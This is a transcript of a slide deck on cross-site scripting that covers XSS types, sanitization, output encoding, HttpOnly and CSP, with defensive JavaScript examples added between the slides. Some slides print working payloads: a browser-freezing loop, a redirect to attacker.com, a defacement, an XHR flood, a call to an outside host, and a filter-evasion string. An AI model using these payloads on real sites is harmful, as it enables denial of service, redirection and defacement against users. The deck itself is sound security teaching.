Devouring Security: Insufficient Data Validation Risks - Cross Site Scripting

Marudhamaran Gunasekaran

Watch the screen recording of the presentation at https://vimeo.com/106302349

Uploaded by gmaran23 on 21-Jun-2015 (51 slides)

DESCRIPTION

Devouring Security: Insufficient Data Validation Risks - Cross Site Scripting (XSS)

• Risk, Stories & the news
• XSS Anatomy
• Untrusted Data Sources – Well, where did that come from?
• Shouldn't it be called CSS instead?
• Types of XSS
  - Type 0 [DOM based]
  - Type 1 [Reflected or Non-persistent XSS]
  - Type 2 [Persistent or Stored XSS]
• Live Demo: XSS 101 with alert('hello XSS world')
• Live Demo: Cookie Hijacking and Privilege Escalation - Face/Off with John Travolta and Nicolas Cage
• Live Demo: Let's deploy some key loggers, huh?
• Mitigations
  - Input Sanitization
    - Popular libraries for .Net, Java, php
    - Demo: Input sanitization
  - Whitelists (vs. Blacklists)
  - Output Encoding
    - Contextual
    - Demo: Output Encoding
  - Browser Protections & bypasses
  - Framework Protections & bypasses
  - Content Security Policy (CSP) in brief
• Secure Code reviews: Spot an XSS, how?
• Tools: Do we have an option?
• XSS Buzz and how to Fuzz
• Renowned Cheat sheets
• Further reading & References

TRANSCRIPT

Page 1: Devouring Security Insufficient data validation risks Cross Site Scripting

Devouring Security

Insufficient Data Validation Risks

Cross Site Scripting

Marudhamaran Gunasekaran

Watch the screen recording of the presentation at https://vimeo.com/106302349

Page 2: Devouring Security Insufficient data validation risks Cross Site Scripting

disclaimer

• Techniques and Tools in this presentation should be used or applied on an application, only with prior consent of the application’s owner. Illegal otherwise.

Page 3: Devouring Security Insufficient data validation risks Cross Site Scripting

Irrational fear of risks against our children

https://www.schneier.com/blog/archives/2014/08/irrational_fear.html

Page 4: Devouring Security Insufficient data validation risks Cross Site Scripting

Perfect security?

http://infosanity.files.wordpress.com/2010/06/dilbert-securitycia.gif

Page 5: Devouring Security Insufficient data validation risks Cross Site Scripting

Information Security Triangle

Page 6: Devouring Security Insufficient data validation risks Cross Site Scripting

XSS

• HTML equivalent of SQL injection? Some say it indeed is.

• "Breaking out of a data context and entering a code context" – Jeff Williams, Chairperson, OWASP

Page 7: Devouring Security Insufficient data validation risks Cross Site Scripting

XSS Anatomy

• Benign input: http://app:8020/odern/AdvSearch?q=xxxxx
  Input: xxxxx | Output: xxxxx

• Malicious input: http://app:8020/odern/AdvSearch?q=<em>xxxxx</em>
  Input: <em>xxxxx</em> | Output: <em>xxxxx</em> (the browser renders the markup)

• Malicious input failure: http://app:8020/odern/AdvSearch?q=<em>xxxxx</em>
  Input: <em>xxxxx</em> | Output: &lt;em&gt;xxxxx&lt;/em&gt; (the markup is encoded and shown as text)

Page 8: Devouring Security Insufficient data validation risks Cross Site Scripting

XSS Anatomy

• Remember your high school?

  How you used to print a < > symbol on an HTML page by writing &lt; &gt;

Page 9: Devouring Security Insufficient data validation risks Cross Site Scripting

Parsers in Browsers

Html Parser

CSS Parser

JavaScript Parser

Page 10: Devouring Security Insufficient data validation risks Cross Site Scripting

XSS

• Breaking out of data context and entering the code context?

• By code context, do I mean?
  • HTML markup
  • HTML attributes
  • JavaScript
  • CSS (not the XSS CSS, but the Cascading Style Sheet CSS)
  • XML
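The anatomy slides show the same search term coming back either as markup or as encoded text; the code-context slide lists the places a value can land. The block below is an added example, not code from the deck, that pairs one encoder with each of those contexts (HTML text, HTML attribute, JavaScript string, CSS string, URL parameter) and renders the slide's <em>xxxxx</em> input through all of them; function names and the rendered page fragment are this example's own, and in production the encoder libraries the deck lists later do this job.

```javascript
// Added example (not from the slides): one encoder per output context.
// The untrusted value is the search term from the XSS anatomy slide; which
// encoder applies depends on where the template places it. Sample inputs are
// constructed for this demo; function names are this example's own.

// HTML text context: the five characters the HTML parser treats as markup.
function htmlEncode(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// HTML attribute context: encode everything but alphanumerics, so the value
// cannot terminate the attribute even if the template forgot the quotes.
function attributeEncode(value) {
  return String(value).replace(/[^A-Za-z0-9]/gu,
    (ch) => `&#x${ch.codePointAt(0).toString(16)};`);
}

// JavaScript string context (inside var q = '...'): hex/unicode escapes, so
// the value can never close the string literal or the <script> element.
function jsStringEncode(value) {
  return String(value).replace(/[^A-Za-z0-9]/gu, (ch) => {
    const cp = ch.codePointAt(0);
    if (cp < 0x100) return '\\x' + cp.toString(16).padStart(2, '0');
    if (cp < 0x10000) return '\\u' + cp.toString(16).padStart(4, '0');
    return '\\u{' + cp.toString(16) + '}';
  });
}

// CSS string context: backslash-hex with a terminating space.
function cssEncode(value) {
  return String(value).replace(/[^A-Za-z0-9]/gu,
    (ch) => '\\' + ch.codePointAt(0).toString(16) + ' ');
}

// URL parameter context: percent-encoding, as the browser's own function does.
function urlParamEncode(value) {
  return encodeURIComponent(String(value));
}

// The "malicious input failure" line from the slide, generalised: the same
// value placed in each context, each time through the encoder for that context.
function renderSearchPage(q) {
  return [
    `<p>Results for: ${htmlEncode(q)}</p>`,
    `<input type="text" value="${attributeEncode(q)}">`,
    `<script>var lastQuery = '${jsStringEncode(q)}';</script>`,
    `<style>.hint::after { content: '${cssEncode(q)}'; }</style>`,
    `<a href="/AdvSearch?q=${urlParamEncode(q)}">search again</a>`,
  ].join('\n');
}

// When run directly: the slide's <em>xxxxx</em> input comes out as text,
// not markup, in every context.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderSearchPage('<em>xxxxx</em>'));
}
```

The point to take from the five contexts is that htmlEncode alone is not enough once the value sits inside an attribute, a script block or a stylesheet: each parser has its own set of significant characters, so the template author has to know which context a value is rendered into and pick the matching encoder.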

Page 11: Devouring Security Insufficient data validation risks Cross Site Scripting

Sources of untrusted data

• URL
• Form data
• Cookies
• Request headers
• External services
• Database

Typical accessors: Request["data"] (ASP.Net), $_REQUEST (php), request.getParameter (Java)

Page 12: Devouring Security Insufficient data validation risks Cross Site Scripting

Demo: XSS 101

• We know <script>alert('xss');</script>

  How about some Samy script?

Page 13: Devouring Security Insufficient data validation risks Cross Site Scripting

Samy - http://namb.la/popular/tech.html

Formatted code: http://security.stackexchange.com/questions/37362/why-is-the-samy-worm-considered-xss

Page 14: Devouring Security Insufficient data validation risks Cross Site Scripting

http://www.zdnet.com/tweetdeck-xss-worm-goes-viral-7000030436/

Page 15: Devouring Security Insufficient data validation risks Cross Site Scripting

Auto send FB credentials to the Tunisian government via inserted javascript on non-https connection

Page 16: Devouring Security Insufficient data validation risks Cross Site Scripting

XSS Types

• Type 0 – DOM based
• Type 1 – Reflected or non-persistent XSS
• Type 2 – Persistent or stored XSS

Page 17: Devouring Security Insufficient data validation risks Cross Site Scripting

Demo: Cookie hijacking and privilege escalation

• Face/Off with John Travolta and Nicolas Cage

Page 18: Devouring Security Insufficient data validation risks Cross Site Scripting

Demo: Cookie hijacking and privilege escalation

• John Travolta – FBI
• Nicolas Cage – Terrorist that planted the bomb
• Where is the bomb? John Travolta would find it by tricking Nicolas Cage

Page 19: Devouring Security Insufficient data validation risks Cross Site Scripting

My fave payload: DoS the client

<script>var j=0;while(true){++j;setTimeout(function(){var i=0;while(true){++i;setTimeout(function(){var w=0;while(true){w++;}},0);}},0);}</script>

Page 20: Devouring Security Insufficient data validation risks Cross Site Scripting

My fave Payload: Redirection

• <script>window.top.location="http://www.attacker.com";</script>

Page 21: Devouring Security Insufficient data validation risks Cross Site Scripting

My fave Payload: Defacing

• <script>document.body.background="http://1.bp.blogspot.com/-ISLWH3-kFpo/Uai4UHCOcrI/AAAAAAAAAmA/a6y9Nq3Bk0g/s1600/logo_blue.gif";</script>

Page 22: Devouring Security Insufficient data validation risks Cross Site Scripting

My fave Payload: Short XHR

• <script>cn=1;while(true){++cn;var w=window,r=w.XMLHttpRequest,j;if(r)r=new r();else for(j in{"Msxml2":1,"Microsoft":1})try{r=new ActiveXObject(j+".XMLHTTP");break}catch(e){}r.open("GET",document.location,false);r.send("");}</script>

• Better yet.. If you have jQuery

<script>$.get('http://prowarenesssecurity:8000/Pss/c.aspx');</script>

Page 23: Devouring Security Insufficient data validation risks Cross Site Scripting

Input Sanitization

• Blacklist
  • Stop anything that starts with a < followed by a character
  • Stop any words such as script, javascript, alert, xss
  • Stop the characters < > " '

• Fails because of elementary evasive techniques like
  • <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet (RSnake)

Page 24: Devouring Security Insufficient data validation risks Cross Site Scripting

Blacklist vs Whitelist

• Blacklist – Don't allow just the bad things I tell you, the rest is fine
  • What is bad? – anything that is bad today, anything the developer thinks of

• Whitelist – Allow only these, I don't care about the rest
  • What is good? – anything the business requires in the functionality
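To make the blacklist-versus-whitelist contrast concrete, here is an added example (not code from the deck) that runs one search field through both approaches. The evasive input is the one quoted on the previous slide: the blacklist fragments, the allowed-characters rule and the legitimate sample value are constructed for this demonstration.

```javascript
// Added example (not from the slides): the same field run through a blacklist
// filter and through a whitelist validator. The evasive input is the one quoted
// on the slides; the blacklist, the allowed-characters rule and the other sample
// values are constructed for this demo.

// Blacklist: reject inputs containing any fragment we know is bad today.
// 'expression(' is here because of IE's CSS expressions; note what that buys us below.
const BLACKLIST = ['<script', 'javascript:', 'expression(', 'onerror=', 'onload='];

function blacklistAccepts(input) {
  const lowered = String(input).toLowerCase();
  return !BLACKLIST.some((fragment) => lowered.includes(fragment));
}

// Whitelist: the business says a search term is letters, digits, spaces and a
// little punctuation, up to 64 characters. Anything else is simply not a search term.
const SEARCH_TERM = /^[A-Za-z0-9 .,'-]{1,64}$/;

function whitelistAccepts(input) {
  return SEARCH_TERM.test(String(input));
}

// Run one value through both and report the verdicts side by side.
function compareFilters(input) {
  return { blacklist: blacklistAccepts(input), whitelist: whitelistAccepts(input) };
}

// From the slide: the word "expression" is split by a CSS comment, so the
// substring 'expression(' never occurs and the blacklist waves it through.
const EVASIVE_INPUT = '<IMG STYLE="xss:expr/*XSS*/ession(alert(\'XSS\'))">';

// Constructed legitimate input: exactly what the business expects in this field.
const LEGIT_INPUT = 'Travolta vs. Cage';

// Whitelist validation narrows what reaches the application; it does not
// replace output encoding, which still has to happen where the value is rendered.
if (typeof require !== 'undefined' && require.main === module) {
  console.log('evasive:', compareFilters(EVASIVE_INPUT));
  console.log('legit:  ', compareFilters(LEGIT_INPUT));
}
```

The blacklist has to anticipate every spelling of every bad thing, and the comment-split keyword from the slide is enough to get past it; the whitelist never had to know about CSS expressions at all, because a `<` is not part of a search term.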

Page 25: Devouring Security Insufficient data validation risks Cross Site Scripting

Don't write your own input sanitizers

• http://blog.codinghorror.com/protecting-your-cookies-httponly/

Page 26: Devouring Security Insufficient data validation risks Cross Site Scripting

AntiXss libraries

• Microsoft AntiXss
• AntiSamy for .Net, AntiSamy for Java
• Reform for php

Page 27: Devouring Security Insufficient data validation risks Cross Site Scripting

Microsoft AntiXss

• InputSanitizer
  • For purifying HTML input

• Encoder
  • For output encoding

Page 28: Devouring Security Insufficient data validation risks Cross Site Scripting

Output encoding libraries

• https://www.owasp.org/index.php/OWASP_Java_Encoder_Project

Page 29: Devouring Security Insufficient data validation risks Cross Site Scripting

HttpOnly please!
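"HttpOnly please!" is a one-line header change; the added example below (not code from the deck) shows the Set-Cookie header a session cookie should carry and a small audit that reports session-looking cookies set without HttpOnly, Secure or SameSite. Cookie names, values and the sample headers are constructed for this demonstration.

```javascript
// Added example (not from the slides): what "HttpOnly please!" looks like on the
// wire, and a small check that flags session cookies set without it. The cookie
// names and header lines below are constructed for the demo.

// Build a Set-Cookie header for a session cookie with the defensive attributes.
function sessionCookieHeader(name, value, { secure = true, sameSite = 'Lax', maxAge = 3600 } = {}) {
  const parts = [`${name}=${encodeURIComponent(value)}`, 'Path=/', `Max-Age=${maxAge}`, 'HttpOnly'];
  if (secure) parts.push('Secure');
  parts.push(`SameSite=${sameSite}`);
  return parts.join('; ');
}

// Parse one Set-Cookie header value into its cookie name and attribute map.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const name = eq === -1 ? pair : pair.slice(0, eq);
  const attributes = new Map();
  for (const attr of attrs) {
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    const val = i === -1 ? true : attr.slice(i + 1);
    attributes.set(key, val);
  }
  return { name, attributes };
}

// Report which defensive attributes are missing on cookies that look like session tokens.
const SESSION_NAME = /sess|auth|token|sid/i;

function auditSetCookies(headers) {
  const findings = [];
  for (const h of headers) {
    const { name, attributes } = parseSetCookie(h);
    if (!SESSION_NAME.test(name)) continue;
    const missing = [];
    if (!attributes.has('httponly')) missing.push('HttpOnly');
    if (!attributes.has('secure')) missing.push('Secure');
    if (!attributes.has('samesite')) missing.push('SameSite');
    if (missing.length) findings.push({ name, missing });
  }
  return findings;
}

// Constructed sample: one bare session cookie, one hardened, one non-session cookie.
const SAMPLE_HEADERS = [
  'ASP.NET_SessionId=abc123; Path=/',
  sessionCookieHeader('auth_token', 'xyz', { sameSite: 'Strict' }),
  'theme=dark; Path=/; Max-Age=31536000',
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(auditSetCookies(SAMPLE_HEADERS));
}
```

HttpOnly keeps script on the page from reading the cookie, which is what takes the cookie-hijacking demo off the table; it does nothing against the other payloads in the deck, so it complements output encoding rather than replacing it.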

Page 30: Devouring Security Insufficient data validation risks Cross Site Scripting

Framework protections

• Ruby on Rails, ASP.Net MVC
  • XSS protections by default through output encoding

• But why don't developers like it? Why do they want to turn the framework protections off?
  • Because they just do not want output encoding by default, since the result does not look right
  • Because they want plain HTML to be rendered at the UI

• Say hello to ASP.Net MVC's Html.Raw()
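The following is an added example, not code from the deck, that shows mechanically what "output encoding by default" and the Html.Raw() opt-out mean: a tagged template that encodes every interpolated value unless the caller wraps it in a raw() marker, plus a small grep for the unencoded sinks a reviewer looks for. The html/raw helpers, the SafeHtml class and the sample view lines are this example's own; Html.Raw() and the ASPX <%= %> versus <%: %> distinction are ASP.Net's.

```javascript
// Added example (not from the slides): what "output encoding by default" means
// mechanically, and what the Html.Raw() style opt-out does to it. The html/raw
// helpers, the SafeHtml marker and the sample source lines are this example's own.

function htmlEncode(value) {
  return String(value)
    .replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;').replace(/'/g, '&#x27;');
}

// Values wrapped by raw() are declared trusted markup and skip encoding,
// the same contract as Html.Raw(): the caller, not the framework, vouches for them.
class SafeHtml {
  constructor(markup) { this.markup = String(markup); }
}
function raw(markup) { return new SafeHtml(markup); }

// Tagged template: every interpolated value is encoded unless it is SafeHtml.
function html(strings, ...values) {
  let out = strings[0];
  values.forEach((value, i) => {
    out += (value instanceof SafeHtml ? value.markup : htmlEncode(value)) + strings[i + 1];
  });
  return out;
}

// The Razor-style default: @name is encoded whatever the user typed.
function greeting(name) {
  return html`<p>Hello, ${name}</p>`;
}

// The opt-out the slide warns about: the same markup now reaches the browser untouched.
function greetingRaw(name) {
  return html`<p>Hello, ${raw(name)}</p>`;
}

// Code-review aid: list the lines in a view that use an unencoded sink, which is
// where a "spot the XSS" review starts. Patterns: ASP.Net's Html.Raw(), ASPX <%= %>
// (unlike <%: %>, it does not encode), and this example's own raw().
const RAW_SINKS = [/Html\.Raw\(/, /<%=/, /\braw\(/];

function findRawSinks(source) {
  return source.split('\n').flatMap((line, i) =>
    RAW_SINKS.some((re) => re.test(line)) ? [{ line: i + 1, text: line.trim() }] : []);
}

// Constructed sample of a view: two encoded outputs, two raw sinks.
const SAMPLE_VIEW = [
  '<p>@Model.Name</p>',
  '<div>@Html.Raw(Model.Bio)</div>',
  '<span><%: data %></span>',
  '<span><%= data %></span>',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  console.log(greeting('<b>Nick</b>'));
  console.log(greetingRaw('<b>Nick</b>'));
  console.log(findRawSinks(SAMPLE_VIEW));
}
```

Every raw() or Html.Raw() call is a place where the framework's default has been switched off by hand, so in review each one needs an answer to "where did this value come from and what sanitised it"; the grep only finds the places to ask.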

Page 31: Devouring Security Insufficient data validation risks Cross Site Scripting

Framework protections – input validation

• ASP.Net's Request Validation
• Why is it there? When does it get triggered? Could we bypass it? Sure.
  • <httpRuntime requestValidationMode="2.0" />
  • AllowHtml
  • ValidateInput(false)
  • ValidateRequest=false
  • Request.Unvalidated….

Use explicit input validation, or AntiXss libraries, when you have request validation turned off

Page 32: Devouring Security Insufficient data validation risks Cross Site Scripting

Browser defenses

• IE
• Chrome
• Safari

• X-XSS-Protection: 1; mode=block

Page 33: Devouring Security Insufficient data validation risks Cross Site Scripting

Browser defenses and bypasses

• https://www.sysdream.com/sites/default/files/Abusing_IE8s_XSS_Filters%20(1).pdf

• https://blog.whitehatsec.com/internet-explorer-xss-filter/

• http://blog.elevenpaths.com/2014/01/how-to-bypass-antixss-filter-in-chrome.html

Page 34: Devouring Security Insufficient data validation risks Cross Site Scripting

XSS Defences

• NoScript addon
• Content-Security-Policy [no wide browser support yet, especially IE]

Page 35: Devouring Security Insufficient data validation risks Cross Site Scripting

Content Security Policy

• 'xxx' is the only domain you should load my
  • Scripts
  • Styles
  • Images
  • Objects
  from

Page 36: Devouring Security Insufficient data validation risks Cross Site Scripting

Content Security Policy

• Blocking mode
• Reporting mode
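The two CSP slides above say what a policy states (the one domain my scripts, styles, images and objects may come from) and the two modes it can run in. As an added example, not code from the deck, the block below builds that policy as a header value, emits it under the blocking or the report-only header name, and answers "would this policy allow that load?" for a handful of resource types; the origins and the report endpoint are constructed placeholders, and the checker matches origins exactly (no wildcard or scheme-only sources) to keep it short.

```javascript
// Added example (not from the slides): building the blocking and reporting forms
// of the CSP header from one policy, plus a small checker for what the policy
// permits. Origins below are constructed placeholders for the demo.

const TYPE_TO_DIRECTIVE = { script: 'script-src', style: 'style-src', img: 'img-src', object: 'object-src' };

// "'xxx' is the only domain you should load my scripts/styles/images/objects from":
// default-src 'none' closes everything, then each type is opened for 'self' plus the listed origins.
function buildPolicy({ self = true, scripts = [], styles = [], images = [], objects = [], reportUri } = {}) {
  const src = (list) => [self ? "'self'" : null, ...list].filter(Boolean).join(' ') || "'none'";
  const directives = [
    "default-src 'none'",
    `script-src ${src(scripts)}`,
    `style-src ${src(styles)}`,
    `img-src ${src(images)}`,
    `object-src ${objects.length ? objects.join(' ') : "'none'"}`,
  ];
  if (reportUri) directives.push(`report-uri ${reportUri}`);
  return directives.join('; ');
}

// Blocking mode enforces; reporting mode only sends violation reports to report-uri.
function cspHeader(policy, { reportOnly = false } = {}) {
  const name = reportOnly ? 'Content-Security-Policy-Report-Only' : 'Content-Security-Policy';
  return { name, value: policy };
}

// Parse "directive source source; directive ..." into a map of directive -> sources.
function parsePolicy(policy) {
  const map = new Map();
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) map.set(tokens[0], tokens.slice(1));
  }
  return map;
}

// Decide whether a load of `type` from `origin` (or 'inline') is allowed on a page
// served from pageOrigin. Falls back to default-src when the type has no directive,
// as the browser does. Simplification: origins are compared exactly.
function isAllowed(policy, { type, origin, pageOrigin }) {
  const map = parsePolicy(policy);
  const sources = map.get(TYPE_TO_DIRECTIVE[type]) || map.get('default-src') || [];
  if (origin === 'inline') return sources.includes("'unsafe-inline'");
  if (sources.includes("'none'")) return false;
  if (sources.includes("'self'") && origin === pageOrigin) return true;
  return sources.includes(origin);
}

// Constructed policy: scripts from self and one CDN, everything else self only.
const DEMO_POLICY = buildPolicy({ scripts: ['https://cdn.example'], reportUri: '/csp-report' });

if (typeof require !== 'undefined' && require.main === module) {
  console.log(cspHeader(DEMO_POLICY));
  console.log(cspHeader(DEMO_POLICY, { reportOnly: true }).name);
  console.log(isAllowed(DEMO_POLICY, { type: 'script', origin: 'inline', pageOrigin: 'https://app.example' }));
}
```

The inline check is the one that matters for the payloads in this deck: without 'unsafe-inline' in script-src, an injected <script> block is refused by the browser even when the page reflected it, which is why the slides present CSP as a defence layered on top of encoding rather than a replacement for it.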

Page 37: Devouring Security Insufficient data validation risks Cross Site Scripting

Content Security Policy

http://content-security-policy.com/

Page 38: Devouring Security Insufficient data validation risks Cross Site Scripting

Content Security Policy

http://content-security-policy.com/

Page 39: Devouring Security Insufficient data validation risks Cross Site Scripting

Tools: Watcher Addon for Fiddler (Passive scanning)

Page 40: Devouring Security Insufficient data validation risks Cross Site Scripting

Tools: XSS Me addon for Firefox (Active scanning)

• Demonstration at http://testfire.net/

Page 41: Devouring Security Insufficient data validation risks Cross Site Scripting

Tools: Xenotix XSS Exploit Framework

Page 42: Devouring Security Insufficient data validation risks Cross Site Scripting

Tools: ModSecurity (Web Application Firewall)

Page 43: Devouring Security Insufficient data validation risks Cross Site Scripting

Tools: Zed Attack Proxy

Page 44: Devouring Security Insufficient data validation risks Cross Site Scripting

Tools: Commercial tools?

• Go figure, shell out

Page 45: Devouring Security Insufficient data validation risks Cross Site Scripting

XSS: Spot during code review

Source: 24 Deadly Sins of Software Security: Programming Flaws and How to Fix Them

Page 46: Devouring Security Insufficient data validation risks Cross Site Scripting

XSS: Spot during code review

Source: 24 Deadly Sins of Software Security: Programming Flaws and How to Fix Them

Page 47: Devouring Security Insufficient data validation risks Cross Site Scripting
Page 48: Devouring Security Insufficient data validation risks Cross Site Scripting

Output encoding options

• php:
  • echo htmlentities($name)
• ASP.Net code behind:
  • lblName.Text = "Hello, " + HttpUtility.HtmlEncode(txtValue.Text);
  • lblName.Text = "Hello, " + AntiXss.HtmlEncode(txtValue.Text);
• ASPX view engine:
  • <%: data %>
• Razor view engine:
  • @data

Page 49: Devouring Security Insufficient data validation risks Cross Site Scripting

Code Review Tools

• Cat.Net still works, with a little tweaking, on an older code base
• Visual Code Grepper

Page 50: Devouring Security Insufficient data validation risks Cross Site Scripting

Popular cheat sheets for XSS prevention

• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

• http://opensecurity.in/the-ultimate-xss-protection-cheat-sheet-for-developers/

Page 51: Devouring Security Insufficient data validation risks Cross Site Scripting

:q!